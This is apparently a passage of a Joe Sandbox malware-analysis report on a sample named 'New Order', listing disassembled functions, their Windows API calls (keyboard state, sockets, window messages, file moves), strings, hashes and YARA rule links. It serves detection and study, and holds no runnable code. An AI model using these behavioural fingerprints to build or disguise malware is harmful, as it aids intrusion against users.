Opcode Fuzzy Hash: 6f3021f09a36392273bceb31a80fb577e2fa873166a0d091702c4a5866004046
Instruction Fuzzy Hash: 12D18C75E0060AAFDF11CFA8C881BAEB7F5BB48344F158469E915AF282D770ED45CB90

Function 00301522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,003017FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 003015CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00301651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,003017FB,?,003017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 003016E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 003016FB

Part of subcall function 002F3820: RtlAllocateHeap.NTDLL(00000000,?,00391444,?,002DFDF5,?,?,002CA976,00000010,00391440,002C13FC,?,002C13C6,?,002C1129), ref: 002F3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,003017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00301777
__freea.LIBCMT ref: 003017A2
__freea.LIBCMT ref: 003017AE

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: b43de31541a788e4d9c22b7e77411c9510b6d960ab3e41a49bd60327d95c8d51
Instruction ID: 6804b2e38a6b145790103c6f66f5b6729c94b93b59537420af942a151c726021
Opcode Fuzzy Hash: b43de31541a788e4d9c22b7e77411c9510b6d960ab3e41a49bd60327d95c8d51
Instruction Fuzzy Hash: D591E671E1220A9EDB228E74CCA1AEEBBB9AF45750F190569E901EB1C0D735DC40CB60

Function 00344523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00344648
VariantInit.OLEAUT32(?), ref: 00344749
VariantClear.OLEAUT32(?), ref: 00344753
VariantClear.OLEAUT32(?), ref: 003447B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0034472C
Null Object assignment in FOR..IN loop, xrefs: 003445D8, 00344706, 003447BE

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 946b657b8acb54ce18aa9440ed2fab43a93787398f1f28ae8aa1d7d04fefbbc7
Instruction ID: f488f1af3dc6d17536f0397be6085c09ce99fb545a022fb183d6afa9255bbf2a
Opcode Fuzzy Hash: 946b657b8acb54ce18aa9440ed2fab43a93787398f1f28ae8aa1d7d04fefbbc7
Instruction Fuzzy Hash: 06918071A00215ABDF22CFA5C884FAEBBF8EF46714F118569F515AF280D770A945CFA0

Function 00331187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0033125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00331284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 003312A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003312D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0033135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003313C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00331430

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: d7661718814c0644c3e6bd6f0169f967a54837f2c7ab5d72e831c0fd2e3a7eb2
Instruction ID: fb94c2914a905cbd3a3afa2b53ff167fc03dc7fcc19d31fbd73f9e741d1893c2
Opcode Fuzzy Hash: d7661718814c0644c3e6bd6f0169f967a54837f2c7ab5d72e831c0fd2e3a7eb2
Instruction Fuzzy Hash: 4791F175A00308AFDB02DFA5C8C4BBEB7B9FF45325F114429E911EB2A1DB74A941CB90

Function 002D948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 473e58fa9e183fef185901a282fb52bbc8e084bf0d4264e37a178fa6c2d70ff0
Instruction ID: 5f1c31d0659094e1b79629062fb4762d71a14bf3d48a965501efc0f797084f29
Opcode Fuzzy Hash: 473e58fa9e183fef185901a282fb52bbc8e084bf0d4264e37a178fa6c2d70ff0
Instruction Fuzzy Hash: E7913571910219AFCB15CFA9C884AEEBBB8FF49320F148456E515B7251D374AE92CBA0

Function 00343947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0034396B
CharUpperBuffW.USER32(?,?), ref: 00343A7A
_wcslen.LIBCMT ref: 00343A8A
VariantClear.OLEAUT32(?), ref: 00343C1F

Part of subcall function 00330CDF: VariantInit.OLEAUT32(00000000), ref: 00330D1F
Part of subcall function 00330CDF: VariantCopy.OLEAUT32(?,?), ref: 00330D28
Part of subcall function 00330CDF: VariantClear.OLEAUT32(?), ref: 00330D34

Strings

Incorrect Parameter format, xrefs: 003439A6, 00343BA1
AUTOIT.ERROR, xrefs: 00343A80, 00343A85

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 57cb3210a43f29132577f7e87a102f02b099cedf5d590f528a06489c9f3e8ade
Instruction ID: 989a33f19874e3aa5422c96b535d49e62c0ed6139a100d6ab71fe5b6f6557164
Opcode Fuzzy Hash: 57cb3210a43f29132577f7e87a102f02b099cedf5d590f528a06489c9f3e8ade
Instruction Fuzzy Hash: 459123756183059FC705EF24C481A6AB7E5FF88314F14896EF88A9B351DB30EE45CB92

Function 00344BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0032000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0031FF41,80070057,?,?,?,0032035E), ref: 0032002B
Part of subcall function 0032000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0031FF41,80070057,?,?), ref: 00320046
Part of subcall function 0032000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0031FF41,80070057,?,?), ref: 00320054
Part of subcall function 0032000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0031FF41,80070057,?), ref: 00320064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00344C51
_wcslen.LIBCMT ref: 00344D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00344DCF
CoTaskMemFree.OLE32(?), ref: 00344DDA

Strings

NULL Pointer assignment, xrefs: 00344E23, 00344E52

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: aa2dc8a040180b395032fde64895ff9214a81c54ba47768063dcfc22ce929216
Instruction ID: d90e91be7d512392a6a51561b9651e811d8e8ff7bd69d77307b08cb07f9b3da4
Opcode Fuzzy Hash: aa2dc8a040180b395032fde64895ff9214a81c54ba47768063dcfc22ce929216
Instruction Fuzzy Hash: 3E911671D0021DAFDF15DFA4D891EEEB7B9BF08314F108269E915AB251DB30AA54CF60

Function 003520FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00352183
GetMenuItemCount.USER32(00000000), ref: 003521B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003521DD
_wcslen.LIBCMT ref: 00352213
GetMenuItemID.USER32(?,?), ref: 0035224D
GetSubMenu.USER32(?,?), ref: 0035225B

Part of subcall function 00323A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00323A57
Part of subcall function 00323A3D: GetCurrentThreadId.KERNEL32 ref: 00323A5E
Part of subcall function 00323A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003225B3), ref: 00323A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003522E3

Part of subcall function 0032E97B: Sleep.KERNEL32 ref: 0032E9F3

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: b1b8cb8a89c88cc18c62f656e8e1a7e3e77fd9c283a78a42110059607b1e2a9d
Instruction ID: 21cbb20817465a07632a0e5d1f677891f764beb8d16ecba57abe84f25f025e13
Opcode Fuzzy Hash: b1b8cb8a89c88cc18c62f656e8e1a7e3e77fd9c283a78a42110059607b1e2a9d
Instruction Fuzzy Hash: 7D71AC75A00205AFCB12DFA5C881EAEB7F5EF49311F158859E816EB361DB34EE418F90

Function 0032AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0032AEF9
GetKeyboardState.USER32(?), ref: 0032AF0E
SetKeyboardState.USER32(?), ref: 0032AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0032AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0032AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0032AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0032B020

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: cf0be94fb4ba4c5793414e2113fd846227fc3603212ee354796e21dbe8520764
Instruction ID: 2e2254f09df4223f4e0b9b3fb39855c9ac50142d07c1532d58f3c2746ade2c6d
Opcode Fuzzy Hash: cf0be94fb4ba4c5793414e2113fd846227fc3603212ee354796e21dbe8520764
Instruction Fuzzy Hash: 7751D3B0604BE53FFB3742349D45BBABFE95B06304F098489E1E9558D2D398ACC4D751

Function 0032ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0032AD19
GetKeyboardState.USER32(?), ref: 0032AD2E
SetKeyboardState.USER32(?), ref: 0032AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0032ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0032ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0032AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0032AE38

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 3fbab320a04d66ef879e837f39e8af6326ae450685cad186f09a835aa8efb78e
Instruction ID: cc9d4a8cb85a91df64e396b7704dff49c40d6fa01bd31532240fc82f5c179de8
Opcode Fuzzy Hash: 3fbab320a04d66ef879e837f39e8af6326ae450685cad186f09a835aa8efb78e
Instruction Fuzzy Hash: CE51E6B1504BE53FFB3383349C55B7ABEA85B45301F098888E1D55A8C2D294EC85E752

Function 002F542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00303CD6,?,?,?,?,?,?,?,?,002F5BA3,?,?,00303CD6,?,?), ref: 002F5470
__fassign.LIBCMT ref: 002F54EB
__fassign.LIBCMT ref: 002F5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00303CD6,00000005,00000000,00000000), ref: 002F552C
WriteFile.KERNEL32(?,00303CD6,00000000,002F5BA3,00000000,?,?,?,?,?,?,?,?,?,002F5BA3,?), ref: 002F554B
WriteFile.KERNEL32(?,?,00000001,002F5BA3,00000000,?,?,?,?,?,?,?,?,?,002F5BA3,?), ref: 002F5584

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 2a3d035c7c5ec0e491f1bd212a771c4c15aeeefa8e83f1d2d0f3d067336ccd8b
Instruction ID: 522ac49577addd175e6486b5eef2b236ab1d04c12cced0792d9fda01647771fe
Opcode Fuzzy Hash: 2a3d035c7c5ec0e491f1bd212a771c4c15aeeefa8e83f1d2d0f3d067336ccd8b
Instruction Fuzzy Hash: 2751E171A107199FDB11CFA8D885AEEFBF9EF08340F14402AFA56E7291D7309A51CB60

Function 003410B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0034304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0034307A
Part of subcall function 0034304E: _wcslen.LIBCMT ref: 0034309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00341112
WSAGetLastError.WSOCK32 ref: 00341121
WSAGetLastError.WSOCK32 ref: 003411C9
closesocket.WSOCK32(00000000), ref: 003411F9

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 31ed9fb58c54cf9a426a66ce0b3c513389d572d8a45d62bbf16e490e072cc3c5
Instruction ID: 4a298b12f6bb45dbd685c74e78b9d71e55dcaec5e4b4c519db65cfd1c69789b5
Opcode Fuzzy Hash: 31ed9fb58c54cf9a426a66ce0b3c513389d572d8a45d62bbf16e490e072cc3c5
Instruction Fuzzy Hash: AA41F431610604AFDB129F24C885BAABBE9EF45368F148159FD099F2A1C770BD81CFA0

Function 0032CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0032DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0032CF22,?), ref: 0032DDFD

Part of subcall function 0032DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0032CF22,?), ref: 0032DE16

lstrcmpiW.KERNEL32(?,?), ref: 0032CF45
MoveFileW.KERNEL32(?,?), ref: 0032CF7F
_wcslen.LIBCMT ref: 0032D005
_wcslen.LIBCMT ref: 0032D01B
SHFileOperationW.SHELL32(?), ref: 0032D061

Strings

\*.*, xrefs: 0032CFF3

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 135d1c559338695c1878f74ec8877a0842a3422c74b0117e5be766ee74b10570
Instruction ID: fca9daeb9cc5b7ef498bd8acdc6a3eeac07935b88164c269022fa8cc80451427
Opcode Fuzzy Hash: 135d1c559338695c1878f74ec8877a0842a3422c74b0117e5be766ee74b10570
Instruction Fuzzy Hash: E44154719552289FDF13EBA4DA81EDEB7B8AF08380F1000E6E545EB152EA34A694CF50

Function 00352DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00352E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00352E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00352E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00352EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00352EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00352EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00352F0B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: ed7e3ce7410a1e8f7ef2d139062af68a3a96b2f08147e89f17ec994bae21304f
Instruction ID: 6a558429ad4804a1c7e7e9d8e06ddd9070702da91d0a83984b03794d7f213a3e
Opcode Fuzzy Hash: ed7e3ce7410a1e8f7ef2d139062af68a3a96b2f08147e89f17ec994bae21304f
Instruction Fuzzy Hash: 95311330604241AFDB23CF58EC86F6677E8EB8A712F1A1165F9009F2B1CB71A844DB80

Function 00327726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00327769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0032778F
SysAllocString.OLEAUT32(00000000), ref: 00327792
SysAllocString.OLEAUT32(?), ref: 003277B0
SysFreeString.OLEAUT32(?), ref: 003277B9
StringFromGUID2.OLE32(?,?,00000028), ref: 003277DE
SysAllocString.OLEAUT32(?), ref: 003277EC

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: b34814dad9ff086ad4eabc90be790135d3266604d3d32414a066408dd8245bfc
Instruction ID: 7fada3283ce7992f5ad004cbc2470fe2d5485d2a178de62c268e45572ea29e27
Opcode Fuzzy Hash: b34814dad9ff086ad4eabc90be790135d3266604d3d32414a066408dd8245bfc
Instruction Fuzzy Hash: 5B21B076604329AFDB12DFACDC88CBB73ACFB09364B008025FA15DB260D670DC418BA4

Function 003277FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00327842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00327868
SysAllocString.OLEAUT32(00000000), ref: 0032786B
SysAllocString.OLEAUT32 ref: 0032788C
SysFreeString.OLEAUT32 ref: 00327895
StringFromGUID2.OLE32(?,?,00000028), ref: 003278AF
SysAllocString.OLEAUT32(?), ref: 003278BD

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d30facf47838d44dc7305a4260c129471d40dd45679ec6858aab7b20e3eef408
Instruction ID: 1e3e1e302f4d393a228db8fabebfeb122cbd1305616e7d8711f9c7428cfadb3d
Opcode Fuzzy Hash: d30facf47838d44dc7305a4260c129471d40dd45679ec6858aab7b20e3eef408
Instruction Fuzzy Hash: 5821A171608224AFDB129FA9EC8DDAA77ECFB08764B108125F915CB2A1E670DC41CB64

Function 003304D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 003304F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0033052E

Strings

nul, xrefs: 00330567

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
